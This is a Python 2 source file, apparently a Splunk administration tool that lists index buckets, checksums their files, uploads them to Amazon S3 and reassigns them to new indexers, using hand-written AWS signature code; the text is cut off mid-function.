KEY_BUCKETNAME = "bucketName"
def __init__(self):
self._bucketCount = 0
# Structure is { index_name : { hot/warm/thaw : { path : buckets } } }.
self._bucketInfo = {}
def __repr__(self):
return pprint.pformat(self._bucketInfo)
#return repr(self._bucketInfo)
def __len__(self):
return self._bucketCount
def addBuckets(self, indexName, bucketType, parentDir, bucketDirs):
if isinstance(bucketDirs, basestring):
bucketDirs = (bucketDirs,)
# Create dict for this index if DNE.
if not indexName in self._bucketInfo:
self._bucketInfo[indexName] = {}
# Create hot/warm/thaw bucket dict if DNE.
if not bucketType in self._bucketInfo[indexName]:
self._bucketInfo[indexName][bucketType] = {}
# Finally, save list of buckets in said dict.
if not parentDir in self._bucketInfo[indexName][bucketType]:
self._bucketInfo[indexName][bucketType][parentDir] = []
for bucket in bucketDirs:
# Don't dupe... helps populating this thing from S3, which lists
# full file paths rather than directories and such.
if bucket in self._bucketInfo[indexName][bucketType][parentDir]:
continue
self._bucketInfo[indexName][bucketType][parentDir].append(bucket)
self._bucketCount += 1
# print bucket
# print self._bucketCount
def items(self):
for indexName, indexInfo in self._bucketInfo.items():
for dirType, indexLocs in indexInfo.items():
for bucketParentDir, buckets in indexLocs.items():
for bucketName in buckets:
yield (indexName, dirType, bucketParentDir, bucketName)
def indexNames(self):
return _bucketInfo.keys()
def toFile(self, filePath):
"""Atomic write by way of temp file. File format is one json object per line."""
tmpPath = filePath + ".tmp"
with open(tmpPath, "w") as outFd:
for indexName, dirType, bucketParentDir, bucketName in self.items():
outDict = {self.KEY_INDEXNAME : indexName,
self.KEY_DIRTYPE : dirType,
self.KEY_BUCKETPARENTDIR : bucketParentDir,
self.KEY_BUCKETNAME : bucketName}
# Sort for easier readability/comparisons.
outFd.write("%s\n" % json.dumps(outDict, sort_keys=True))
shutil.move(tmpPath, filePath)
def fromFile(self, filePath):
"""Hope nobody's corrupted you..."""
inFd = open(filePath, "r")
for line in inFd:
inDict = json.loads(line.strip())
self.addBuckets( inDict[self.KEY_INDEXNAME],
inDict[self.KEY_DIRTYPE],
inDict[self.KEY_BUCKETPARENTDIR],
(inDict[self.KEY_BUCKETNAME],))
class TransferMetadata(object):
"""Per-file info. Currently this just holds checksums."""
_md5Hash = None
def __init__(self, kvDict):
# TODO: validate contents look reasonable.
# TODO: complain about any unrecognized data.
# XXX ...
if KEY_MD5HASH in kvDict:
self._md5Hash = kvDict[KEY_MD5HASH]
def md5Hash(self):
return self._md5Hash
def setMd5Hash(self, md5Hash):
self._md5Hash = md5Hash
def asDict(self):
# Aim to not save incomplete data structures! Indicates user error.
# TODO: Maybe we need this so can do scan, then checksum...
if not self._md5Hash:
raise Exception, "Bug: Attempting to serialize metadata without computing MD5 checksum."
return {KEY_MD5HASH : self._md5Hash}
class TransferMetadataCollection(object):
"""Complete list of buckets, their metadata, etc to be transferred."""
_metadataDict = {}
_filePath = None
def __contains__(self, filePath):
return filePath in self._metadataDict
def add(self, filePath, metadata):
"""Add metadata for a file."""
self._metadataDict[filePath] = TransferMetadata(metadata)
def __init__(self, filePath):
"""Load existing metadata from disk."""
self._filePath = filePath
data = splunk.clilib.cli_common.readConfFile(self._filePath)
# File does not exist, or empty for some reason.
if not data or (1 == len(data) and "default" in data):
return
for filePathStanza, metadata in data.items():
self.add(filePathStanza, metadata)
def scan_for_new_files(self, bucketCollection):
"""Scan the bucket parent dirs for any files that we don't already know
about. Any missing files will be added to our collection."""
for indexName, dirType, bucketParentDir, bucketName in bucketCollection.items():
bucketPath = os.path.join(bucketParentDir, bucketName)
# Recursive file listing.
for dirPath, subdirs, files in os.walk(bucketPath):
for file in files:
filePath = os.path.join(dirPath, file)
if not filePath in self:
self.add(filePath, {}) # Empty metadata for now.
def generate_missing_checksums(self):
"""Generate MD5 checksums for any files in our existing list that don't
have them populated. Note that this does not cause a rescan, but
after the first requested scan, this will result in checksumming all
files. Also ote that this function does not verify existing
populated checksums."""
# Check for and generate MD5s.
for filePath, metadata in self._metadataDict.items():
if not metadata.md5Hash():
print "Generating MD5 for file=\"%s\"..." % filePath
fd = open(filePath, "rb")
metadata.setMd5Hash(fileMd5Hash(fd))
def write(self):
"""Save built up dict to disk in one shot. Not an incremental write,
but does do an atomic overwrite of the dest file (by way of temp
file)."""
writeableDict = {}
for filePath, metadata in self._metadataDict.items():
writeableDict[filePath] = metadata.asDict()
tmpFilePath = self._filePath + ".tmp"
splunk.clilib.cli_common.writeConfFile(tmpFilePath, writeableDict)
# Success! Simulate atomic write.
shutil.move(tmpFilePath, self._filePath)
### def make_metafile_path(instanceGuid):
### mfPath = os.path.expanduser(os.path.join("~", "/splunk_bucketfiles_%s.conf" % instanceGuid))
### if mfPath.startswith("~"):
### raise Exception, "Could not lookup home dir while creating metafile path!"
### return mfPath
def fileMd5Hash(fd):
hasher = hashlib.md5()
while True:
data = fd.read(65536)
if not data:
break
hasher.update(data)
return hasher.hexdigest()
### def generate_s3_upload_commands(instanceGuid, bucketCollection):
### for indexName, dirType, bucketParentDir, bucketName in bucketCollection.items():
### print "aws s3 sync %s s3://amrit-test/nike_cluster_indexes/%s/%s/%s/%s" % (
### os.path.join(bucketParentDir, bucketName),
### indexName, dirType, instanceGuid, bucketName)
def get_instance_guid():
instanceCfg = splunk.clilib.cli_common.readConfFile(
os.path.join(splunk.clilib.cli_common.splunk_home, "etc", "instance.cfg"))
return instanceCfg["general"]["guid"]
class CMD_GenBucketlistWarmCold(object):
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
allBuckets = self.get_instance_buckets()
dstPath = self.make_bucketlist(self.instance_guid)
allBuckets.toFile(dstPath)
print "\nSaved bucket listing to file=\"%s\"." % dstPath
if self._args.print_all:
pprint.pprint(allBuckets)
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("--no-warn-on-hots", action="store_true",
help="Do not warn if any hot buckets are found.")
myParser.add_argument("--ignore-manifests", action="store_true",
help="Don't store .bucketManifest contents (these usually are not needed).")
myParser.add_argument("--indexes", default="",
help="CSV whitelist of names of indexes to dump.")
myParser.add_argument("--print-all", action="store_true",
help="Also print all index paths that will be processed, and the resulting buckets.")
def make_bucketlist(self, instanceGuid):
return "splunk_bucketlist_%s.json" % instanceGuid
def filter_to_requested_indexes(self, indexLocations, indexWhitelist):
if not indexWhitelist:
return indexLocations
filtered = []
for index in indexLocations:
if index.indexName in indexWhitelist:
filtered.append(index)
return filtered
def get_instance_buckets(self):
"""Returns a BucketCollection."""
indexLocations = splunkDBPaths(splunk.clilib.cli_common.getMergedConf('indexes'))
### TODO: review what's being filtered out.
indexLocations = filter_internal_index_dirs(indexLocations)
indexLocations = self.filter_to_requested_indexes(indexLocations, self._args.indexes)
if self._args.print_all:
print "Enabled index paths:\n\t%s\n" % str.join("\n\t",
[ x.dirPath for x in indexLocations ])
return self.enumerate_buckets_in_dirs(indexLocations)
def enumerate_buckets_in_dirs(self, indexLocations):
"""Returns a BucketCollection."""
IGNORE_FILES = ["GlobalMetaData", "CreationTime"]
bucketCollection = BucketCollection()
if not self._args.ignore_manifests:
timeStr = time.strftime("%Y%m%d-%H%M%S", time.gmtime())
manifestBaseDir = os.path.join("splunk_bucketmanifests",
self.instance_guid, timeStr)
print "Will save bucket manifests to dir=\"%s\".\n" % manifestBaseDir
os.makedirs(manifestBaseDir)
for thisIndexLoc in indexLocations:
bucketDirs = []
dirEntries = os.listdir(thisIndexLoc.dirPath)
for thisEntry in dirEntries:
if thisEntry.startswith("db_") or thisEntry.startswith("rb_"):
bucketDirs.append(thisEntry)
# Store manifest in splunk_bucketmanifests/guid/time/index/dirType/.
elif ".bucketManifest" == thisEntry:
if self._args.ignore_manifests:
continue
dstDir = os.path.join(manifestBaseDir,
thisIndexLoc.indexName, thisIndexLoc.dirType)
os.makedirs(dstDir)
# Copy to non-dot filename for easy viewing.
shutil.copy(os.path.join(thisIndexLoc.dirPath, ".bucketManifest"),
os.path.join(dstDir, "bucketManifest"))
# These non-bucket files don't need to be transferred, per VP.
elif thisEntry in IGNORE_FILES:
pass
# Hot bucket or streaming/replicating hot bucket!
elif thisEntry.startswith("hot_") or thisEntry[0].isdigit():
if self._args.no_warn_on_hots:
continue
print "*** WARNING: Ignoring hot bucket=\"%s\" ***" % \
os.path.join(thisIndexLoc.dirPath, thisEntry)
else:
print "*** ODD PATH FOUND: %s ***" % \
os.path.join(thisIndexLoc.dirPath, thisEntry)
if 0 != len(bucketDirs):
bucketCollection.addBuckets(thisIndexLoc.indexName,
thisIndexLoc.dirType, thisIndexLoc.dirPath, bucketDirs)
return bucketCollection
class CMD_GenChecksumsFromBucketlist(object):
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
knownBuckets = BucketCollection()
knownBuckets.fromFile(self._args.input_file)
self.process_all_files(knownBuckets)
### pprint.pprint(knownBuckets)
### metaPath = make_metafile_path(instanceGuid)
### metadataCollection = TransferMetadataCollection(metaPath)
### metadataCollection.scan_for_new_files(allBuckets)
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("input_file")
def make_checksum_filename(self, instanceGuid):
return "splunk_%s_%s.md5" % (KEY_CHKSUMLIST, instanceGuid)
def split_whole_path(self, pathToSplit):
"""Python, why you make me do this..."""
pieces = []
while True:
parents, pathSeg = os.path.split(pathToSplit)
if parents == pathToSplit:
pieces.append(pathToSplit)
break
pieces.append(pathSeg)
pathToSplit = parents
pieces.reverse()
return pieces
def bucket_item_rel_path(self, bucketPath, bucketName):
pieces = self.split_whole_path(bucketPath)
bucketNameIdx = pieces.index(bucketName)
# db_1417732610_1417300621_105/rawdata -> _internaldb/db/db_1417732610_1417300621_105/rawdata
indexNameIdx = bucketNameIdx - 2
return os.path.join(*pieces[indexNameIdx:])
def process_all_files(self, knownBuckets):
fn = self.make_checksum_filename(self.instance_guid)
print "Writing to path=%s ..." % fn
outFd = open(fn, "w")
sys.stdout.write("Working...")
for index, dirType, dirPath, bucketName in knownBuckets.items():
for parentDir, subdirs, files in os.walk(os.path.join(dirPath, bucketName)):
# DEBUG print parentDir, subdirs, files
for file in files:
bucketItemPath = os.path.join(parentDir, file)
itemRelPath = self.bucket_item_rel_path(bucketItemPath, bucketName)
with open(bucketItemPath, "r") as inFd:
# Two spaces here are important for "md5sum -c" to later work!
outFd.write("%s %s\n" % (fileMd5Hash(inFd), itemRelPath))
sys.stdout.write(".")
sys.stdout.flush()
sys.stdout.write(" Done!\n\n")
class RoundRobinFileReader(object):
"""Very simple way of round robining line-read requests across a set of
files. Note that for a large set of passed-in files, this implementation
will result in many file descriptors being open concurrently (one per)..."""
def numFiles(self):
return len(self._fdList)
def __init__(self, rawFDs):
"""Accepts list of readable FDs. This used to take in actual filepaths
but I changed it to FDs just to make testing a little easier. Could
still use another interface for taking filepaths."""
self._fdList = rawFDs
self._curFdIdx = 0
self._closedFds = 0
def readline(self):
while True:
curFd = self._fdList[self._curFdIdx]
# Already saw EOF on this fd.
if curFd.closed:
# Next fd...
self._curFdIdx = (self._curFdIdx + 1) % self.numFiles()
continue
line = curFd.readline()
# EOF, close this fd.
if 0 == len(line):
curFd.close()
self._closedFds += 1
# Are all files at EOF?
if self.numFiles() == self._closedFds:
# Return EOF for entire file set.
return ""
# Next fd...
self._curFdIdx = (self._curFdIdx + 1) % self.numFiles()
continue
self._curFdIdx = (self._curFdIdx + 1) % self.numFiles()
return line
def __iter__(self):
"""Returns lines until we're out."""
while True:
line = self.readline()
# EOF.
if 0 == len(line):
return
yield line
class CMD_GenRandBucketOwnersFromBucketList(object):
class AssumedPrimaryBucket(object):
def __init__(self, jsonBlob):
attrDict = json.loads(jsonBlob)
bucketDirName = attrDict[BucketCollection.KEY_BUCKETNAME]
self.bucketId = str.join("_", bucketDirName.split("_")[1:4])
self.instanceGuid = bucketDirName.split("_")[4]
self.indexName = attrDict[BucketCollection.KEY_INDEXNAME]
class PrimaryBucketCollection(object):
# { bucketId : { indexName : primaryInstanceGuid } }
_bucketDict = {}
def maybeAdd(self, bucket):
"""Returns True if bucket is now stored with this instance GUID as
primary owner."""
if not bucket.bucketId in self._bucketDict:
self._bucketDict[bucket.bucketId] = {}
if not bucket.indexName in self._bucketDict[bucket.bucketId]:
self._bucketDict[bucket.bucketId][bucket.indexName] = bucket.instanceGuid
return True
return False
def toFile(self, path):
fd = open(path, "w")
for buckId, buckAttrs in self._bucketDict.items():
for buckName, buckOwnerGuid in buckAttrs.items():
fd.write("%s\n" % json.dumps(
{buckId : {buckName : buckOwnerGuid}}))
def run(self, args):
self._args = args
if 1 == len(self._args.filenames):
raise Exception, "This command does not make sense if only one bucketlist file is specified (you specified: %s)" % self._args.filenames[0]
rawFDs = [open(filepath, "r") for filepath in self._args.filenames]
rrFd = RoundRobinFileReader(rawFDs)
primBuckColl = self.PrimaryBucketCollection()
guidCounter = {}
for line in rrFd:
apb = self.AssumedPrimaryBucket(line)
if primBuckColl.maybeAdd(apb):
if not apb.instanceGuid in guidCounter:
guidCounter[apb.instanceGuid] = 1
else:
guidCounter[apb.instanceGuid] += 1
print "Stats for created bucket listing:"
for instance, count in guidCounter.items():
print "\tInstance=%s is assumed primary for num_buckets=%d." % (instance, count)
outPath = "splunk_bucketowners.json"
print "Saving bucket list to path=%s." % outPath
primBuckColl.toFile(outPath)
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("filenames", nargs="+")
def build_s3_download_bucket_command(destDir, s3Path):
return ("aws", "s3", "sync",
s3Path.rstrip(os.sep) + os.sep, # this prob doesn't matter, but...
destDir.rstrip(os.sep) + os.sep)
def build_s3_upload_bucket_command(bucketPath, instanceGuid, indexName, dirType):
"""Kinda stolen from freezeBucketToS3.py (TODO: unify)."""
bucketName = os.path.basename(bucketPath)
destS3Uri = "s3://%s/%s/%s/%s/%s" % (
S3_BASE_PATH.strip("/"),
instanceGuid,
indexName,
dirType,
bucketName)
return ("aws", "s3", "sync", bucketPath, destS3Uri)
def build_s3_upload_extradata_command(itemPath, instanceGuid):
"""Kinda stolen from freezeBucketToS3.py (TODO: unify)."""
uploadMode = os.path.isdir(itemPath) and "sync" or "cp"
itemPath = os.path.basename(itemPath)
destS3Uri = "s3://%s/%s/%s/%s" % (
S3_BASE_PATH.strip("/"),
instanceGuid,
KEY_EXTRADATA,
itemPath)
return ("aws", "s3", uploadMode, itemPath, destS3Uri)
def run_s3_command(cmdPieces, upOrDown):
"""Kinda stolen from freezeBucketToS3.py (TODO: unify)."""
assert upOrDown in (MODE_UPLOAD, MODE_DOWNLOAD)
# 5 retries per upload command, because why not?
for i in range(5):
# Hacky. TODO
sys.stdout.write("%s\n %s=%s\n %s=%s\n ..." % (
upOrDown == MODE_UPLOAD and "Uploading" or "Downloading",
upOrDown == MODE_UPLOAD and "src" or "dst", cmdPieces[-2],
upOrDown == MODE_UPLOAD and "dst" or "src", cmdPieces[-1]))
sys.stdout.flush()
# TODO: Do this a bit smarter.. have to make sure we call the system
# python here, totally fails on Ubuntu (but not RHEL6)...
env = os.environ
env["PATH"] = "/usr/local/bin:/usr/bin:/opt/ec/aws_client/bin"
env["LD_LIBRARY_PATH"] = ""
env["PYTHON_PATH"] = ""
proc = subprocess.Popen(cmdPieces, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=False, env=env)
(stdout, stderr) = proc.communicate()
# Success!
if 0 == proc.returncode:
sys.stdout.write(" Done!\n")
sys.stdout.flush()
return True
sys.stdout.write("\n")
sys.stdout.flush()
sys.stderr.write("FAILED command %s !\n\n==> STDOUT:\n%s\n==> STDERR:\n%s\n\n" % (
cmdPieces, stdout, stderr))
# All 5 attempts failed... Caller should consider this fatal for entire job.
return False
class CMD_UploadBucketsToS3FromBucketList(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
# MESSY! Use the builder functions... TODO
inputFile = "splunk_bucketlist_%s.json" % self.instance_guid
EXTRADATA = ("splunk_bucketmanifests",
inputFile,
# MESSY! Use the builder functions... TODO
"splunk_%s_%s.md5" % (KEY_CHKSUMLIST, self.instance_guid))
for file in EXTRADATA:
if not os.path.exists(file):
raise Exception, "File %s does not exist - are you sure you" \
" followed the directions?" % file
knownBuckets = BucketCollection()
knownBuckets.fromFile(inputFile)
for file in EXTRADATA:
cmdPieces = build_s3_upload_extradata_command(file, self.instance_guid)
# DEBUG: print cmdPieces
if not run_s3_command(cmdPieces, MODE_UPLOAD):
raise Exception("Upload process failed, please triage and try again!")
for index, dirType, dirPath, bucketName in knownBuckets.items():
bucketDirPath = os.path.join(dirPath, bucketName)
cmdPieces = build_s3_upload_bucket_command(bucketDirPath,
self.instance_guid, index, dirType)
# DEBUG: print cmdPieces
if not run_s3_command(cmdPieces, MODE_UPLOAD):
raise Exception("Upload process failed, please triage and try again!")
print "\nALL UPLOADS COMPLETE!\n"
class CMD_ListAllSplunkBucketsFromS3(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("s3url", help="S3 path to enumerate (like s3://foo/bar)")
myParser.add_argument("region", help="AWS region (like us-west-2)")
myParser.add_argument("guid", help="Guid of the on prem server")
def run(self, args):
self._args = args
if not self._args.s3url.startswith(S3_URL_PREFIX):
raise Exception("Only S3 URLs are supported - URL must begin with s3://...")
if not "AWS_ACCESS_KEY" in os.environ:
raise Exception("Command will not work without AWS_ACCESS_KEY set in environment.")
if not "AWS_SECRET_KEY" in os.environ:
raise Exception("Command will not work without AWS_SECRET_KEY set in environment.")
s3FullPath = self._args.s3url[len(S3_URL_PREFIX):]
if "/" in s3FullPath:
s3Bucket, s3Path = s3FullPath.split("/", 1)
else:
s3Bucket = s3FullPath
s3Path = ""
print "Will list: s3://%s/%s" % (s3Bucket, s3Path)
onPremGuid = self._args.guid
coll = BucketCollection()
checksumURLs = []
getOffset = None
s3Path_ccs = s3Path+"/"+onPremGuid
print "Working on "+s3Path_ccs
while True:
# throws on any non-200 response.
resp = self.issue_s3_request(s3Bucket, s3Path_ccs, getOffset)
getOffset = self.parseS3ListingXML(coll, checksumURLs, resp, s3Bucket, s3Path)
if not getOffset:
outPath = "bucketsInS3-"+onPremGuid+".json"
print "Saving to %s ..." % outPath
coll.toFile(outPath)
coll = BucketCollection()
break
print "Done."
if not checksumURLs:
print "No checksum files to download."
else:
print "Downloading checksum files..." % checksumURLs
for csumPath in checksumURLs:
dlCmd = ["aws", "s3", "cp", csumPath, "."]
if not run_s3_command(dlCmd, MODE_DOWNLOAD):
raise Exception("Checksum download process failed, please triage and try again!")
print "Done."
def parseS3ListingXML(self, coll, csums, resp, s3Bucket, s3Path):
"""Output: coll (BucketCollection), csums (checksums), nextOffset.
If we need to fetch more data, returns offset marker."""
bucketRegex = re.compile("([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})" \
"/([^/]+)/([^/]+)/([dr]b_\\d+_\\d+_\\d*" \
"(_[\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})?(-tmp)?)/?(.*)")
# str - stupid xml lib barfs on unicode str w/ encoding declaration (<?xml>).
xmlRoot = et.fromstring(str(resp))
# Exception here would mean S3 response format has changed.
isTruncated = bool(xmlRoot.find(".//{%s}IsTruncated" % XML_AWS_NS).text)
lastItem = None
for item in xmlRoot.findall(".//{%s}Key" % XML_AWS_NS):
lastItem = item.text # :-/
# Strip the leading prefix the user requested... NOTE: this restricts
# us to only treating prefix as a directory path rather than an
# partial-filename prefix - this is totally ok for us.
# Strip in case no trailing slash in user specified S3 path...
itemPath = item.text[len(s3Path):].strip("/")
# Silently skip some just-in-case diagnostic info we've uploaded...
if -1 != itemPath.find(KEY_EXTRADATA):
# But keep the checksums, we'll use these.
if KEY_CHKSUMLIST in itemPath:
csums.append("s3://%s/%s/%s" % (s3Bucket, s3Path, itemPath))
continue
matches = bucketRegex.match(itemPath)
if not matches:
raise Exception, "Not proceeding - found itemPath=\"%s\" that" \
" does not match bucketRegex - please investigate." % itemPath
# maybeBucketGuid is unused, the optional guid capture group...
indexerGuid, indexName, buckDirType, bucketName, \
maybeBucketGuid, maybeTmp, afterBucketName = matches.groups()
parentPathInS3 = "%s/%s/%s/%s/%s" % (s3Bucket, s3Path, indexerGuid,
indexName, buckDirType)
# DEBUG: print "GUID: %s, index: %s, dirType: %s,\t name: %s" % (
# DEBUG: indexerGuid, indexName, buckDirType, bucketName)
coll.addBuckets(indexName, buckDirType, "s3://%s" % parentPathInS3,
(bucketName,))
return isTruncated and lastItem or None
def issue_s3_request(self, s3Bucket, s3Path, offset):
method = "GET"
s3FullHost = "%s.%s" % (s3Bucket, S3_HOSTNAME)
emptyHash = hashlib.sha256("").hexdigest()
timeNow = time.gmtime()
headers = {
"Host" : s3FullHost
, "x-amz-content-sha256" : emptyHash # No request body.
, "x-amz-date" : time.strftime("%Y%m%dT%H%M%SZ", timeNow)
}
getParams = {}
if len(s3Path):
getParams["prefix"] = s3Path
if offset:
getParams["marker"] = offset
headers["Authorization"] = self.build_s3_auth_token(method, headers,
emptyHash, timeNow, getParams)
req = requests.Request(method, "https://%s" % s3FullHost,
params=getParams, data="", headers=headers)
sess = requests.Session()
# This is better than req.prepare() because it can apply cookies/etc...
prepReq = sess.prepare_request(req)
resp = sess.send(prepReq)
if 200 != resp.status_code:
raise Exception, "Request failed, response_code=%d, response=%s !!" \
% (resp.status_code, resp.text)
return resp.text
def build_s3_auth_token(self, httpMethod, headers, contentHash, requestTime,
getParams):
"""Did this whole mess (AWS4 auth) to avoid a dependency on boto within
the Splunk Python installation..."""
dateOnly = time.strftime("%Y%m%d", requestTime)
dateTime = time.strftime("%Y%m%dT%H%M%SZ", requestTime) # ISO8601 per AWS API.
# DEBUG: print "headers: %s" % headers
# All headers that we include in canonicalRequest.
signedHeaders = str.join(";", sorted(headers.keys())).lower()
# AWS, why u auth so picky (http://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-header-based-auth.html)
# DEBUG: print "signedHeaders: %s" % signedHeaders
canonicalRequest = str.join("\n", [
httpMethod
, "/" # Enter a full path here only to download an actual object...
# Per http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html
, str.join("&", [urllib.urlencode({k : getParams[k]})
for k in sorted(getParams.keys())])
# Don't necessarily have to hash ALL headers, but it's easiest and only more secure.
, str.join("\n", ["%s:%s" % (key.lower(), headers[key]) for key in sorted(headers.keys())])
, "" # Empty line after headers, like HTTP.
, signedHeaders
, contentHash # Matches headers (no request body).
])
canonicalRequestHash = hashlib.sha256(canonicalRequest).hexdigest()
# DEBUG: print "canonicalRequest: %s" % canonicalRequest
# DEBUG: print "canonicalRequestHash: %s" % canonicalRequestHash
credentialScope = "%s/%s/%s/%s" % (dateOnly, self._args.region, "s3", "aws4_request")
# DEBUG: print "credentialScope: %s" % credentialScope
# http://docs.aws.amazon.com/general/latest/gr/sigv4-create-string-to-sign.html
stringToSign = str.join("\n", [
"AWS4-HMAC-SHA256"
, dateTime
, credentialScope
, canonicalRequestHash
])
# DEBUG: print "stringToSign: %s" % stringToSign
def sign(key, content):
# DEBUG: print "to-sign content=%s with key=%s" % (content, key)
output = hmac.new(key, content, hashlib.sha256).digest()
# DEBUG: print " ==> output=%s" % output
return output
a = sign(("AWS4%s" % os.environ["AWS_SECRET_KEY"]), dateOnly)
b = sign(a, self._args.region)
c = sign(b, "s3")
d = sign(c, "aws4_request")
# Note hexdigest vs digest above...
signature = hmac.new(d, stringToSign, hashlib.sha256).hexdigest()
# DEBUG: print "signature=%s" % signature
return "%s Credential=%s/%s,SignedHeaders=%s,Signature=%s" % (
"AWS4-HMAC-SHA256", os.environ["AWS_ACCESS_KEY"],
credentialScope, signedHeaders, signature)
# TODO this needs to accomodate actual index paths, not make assumptions...
def bucketDirTypeToDirName(buckType):
# I think freezeBucketToS3.py uploads into a "cold" dir, which is a mistake...
if buckType in ("coldPath", "cold"):
return "colddb"
# TODO: test this stuff with bulk upload...
if buckType == "homePath":
return "db"
if buckType == "thawedPath":
return "thaweddb"
raise Exception, "Unexpected buckettype=%s." % buckType
# TODO
def getSearchableIndexName(indexName):
"""Names are stored differently in the s3 upload - we use the index name,
not the index path on disk!! Hopefully then names and index dirs for
all non-predefined indexes are not different! TODO"""
if indexName == "main":
return "defaultdb"
if indexName == "_audit":
return "audit"
if indexName == "_internal":
return "_internaldb"
if indexName == "corp":
return "corpdb"
if indexName == "owa":
return "owadb"
if indexName == "pan":
return "pandb"
if indexName == "pci":
return "pcidb"
if indexName == "prod":
return "proddb"
if indexName == "summary":
return "summarydb"
return indexName
# TODO
def getDisplayIndexName(indexName):
"""Reverse of getSearchableIndexName. Opencoding rather than collapsing into
a dict so I can guarantee other codepaths are unaffected."""
if indexName == "defaultdb":
return "main"
if indexName == "audit":
return "_audit"
if indexName == "_internaldb":
return "_internal"
return indexName
class CMD_GenNewBucketOwnersFromS3BucketList(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("--extra-copies", type=int, default=0, metavar="num",
help="Cause \"num\" extra copies of each bucket to be" \
" downloaded. Can be of use if only one copy of each" \
" bucket was uploaded.\n" \
"Does NOT take geosites into account.")
myParser.add_argument("--no-checksums", action="store_true")
myParser.add_argument("bucket_list", help="JSON file from list-all-buckets...s3")
myParser.add_argument("guid_list",
help="File: GUIDs for new indexers, one per line, must have .guids extension")
myParser.add_argument("index", help="The name of the index to re-assign")
def run(self, args):
self._args = args
selected_index = self._args.index
print "Limiting reassignemt to "+selected_index
# Error checks.
if not self._args.bucket_list.endswith(".json"):
raise Exception("Bucket list file must have .json extension" \
" - are you sure you passed the correct filename" \
" (you passed \"%s\")?" % self._args.bucket_list)
if not self._args.guid_list.endswith(".guids"):
raise Exception("GUID list file must have .guids extension" \
" - are you sure you passed the correct filename" \
" (you passed \"%s\")?" % self._args.guid_list)
if self._args.extra_copies:
if self._args.extra_copies > 5:
raise Exception("Aborting - highly unlikely you want to create" \
" more than 5 copies of each bucket!")
print "Will create %d additional copies of each bucket." \
% self._args.extra_copies
guidRE = re.compile("^[\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12}$")
indexerGuids = []
with open(self._args.guid_list, "r") as guidFd:
for line in guidFd:
line = line.strip()
if not guidRE.match(line):
print "WARNING: Skipping non-guid line: \"%s\" from file=%s." % (
line, self._args.guid_list)
continue
indexerGuids.append(line)
# Look for downloaded checksum files.
csumFiles = []
if not self._args.no_checksums:
csumGlob = "splunk_%s_*" % KEY_CHKSUMLIST
csumFiles = glob.glob(csumGlob)
if not csumFiles:
raise Exception, "Found no checksum files matching glob %s." \
" If you want to skip the ability to checksum, use" \
" --no-checksums." % csumGlob
print "Found %d checksum lists." % len(csumFiles)
# Hi I came to take ur RAM. Sorry, this has to be relatively quick and dirty for now...
csumDict = {}
for file in csumFiles:
with open(file, "r") as csumFd:
for line in csumFd:
# Slower but more resilient... Could just count the 32 bytes + 2 spaces...
left, messyRight = line.split(" ", 1)
right = messyRight.lstrip().rstrip("\r\n")
# TODO: make sure os.sep is right to use here... should be... (windows).
#
index, garbage, bucket = right.split(os.sep)[0:3]
if not index in csumDict:
csumDict[index] = {}
if not bucket in csumDict[index]:
csumDict[index][bucket] = {}
# Store in RAM: bucket name, filepath, checksum. Will look these up soon..
csumDict[index][bucket][right] = left
# TODO: we prob need a guid dict level too - 2 replicated buckets will have non-unique
# names if now living on 2 different GUIDs.
# DEBUG: print csumDict
# Read bucket list.
coll = BucketCollection()
coll.fromFile(self._args.bucket_list)
print "Found %d buckets in file=%s." % (
len(coll), self._args.bucket_list)
print "Will distribute %d buckets to %d indexers per file=%s." % (
len(coll) * (1 + self._args.extra_copies), len(indexerGuids),
self._args.guid_list)
# Main spraying loop - just builds file lists, doesn't download anything.
bucketColls = {} # Output - eventually written to file.
csumColls = {} # Also output, written to another file.
# Very much like bucketColls. However, strips db_ and rb_ so we can
# see whether a bucket with the remaining portion
# (timestamps/serial/guid) is already allocated to this indexer. We can
# do this WAY smarter, by storing the IDs in bucketColls along with a an
# attr describing whether it's rb_ or db_. But not making that change
# this late in the game... TODO. Also, BucketCollection could and
# should do this for is.
bucketIds = {}
for guid in indexerGuids:
bucketColls[guid] = BucketCollection()
csumColls[guid] = []
bucketIds[guid] = []
guidOff = 0
bucketIdRE = re.compile('^[dr]b_(.*)')
found = 0
prev_indexName = "foo"
prev_num = 0
step = 10000
for indexName, dirType, bucketParentDir, bucketName in coll.items():
#if indexName != prev_indexName:
# print indexName
# prev_indexName = indexName
if indexName != selected_index: continue
if found == 0 :
print "Found index="+indexName
found = 1
remainingCopies = 1 + self._args.extra_copies
# TODO freezeBucketToS3.py
realIndexDirName = getSearchableIndexName(indexName)
bucketId = bucketIdRE.match(bucketName).group(1) # eg: db_1416781732_1416781534_9_D1EBB8B2-DA8A-401E-8AC2-A98214754674
num_guid_trys = 0
while remainingCopies > 0:
guid = indexerGuids[guidOff]
num_guid_trys = num_guid_trys + 1
# Does this indexer already have a bucket with this ID assigned
# to it (maybe an rb_ for this db_, etc)?
if bucketId in bucketIds[guid]:
# print bucketId, guid, remainingCopies
# Let's try finding another...
guidOff = (guidOff + 1 < len(indexerGuids)) and guidOff + 1 or 0
#print str(num_guid_trys)+" BucketId is already in the list. "+bucketId+" guidOff="+str(guidOff)
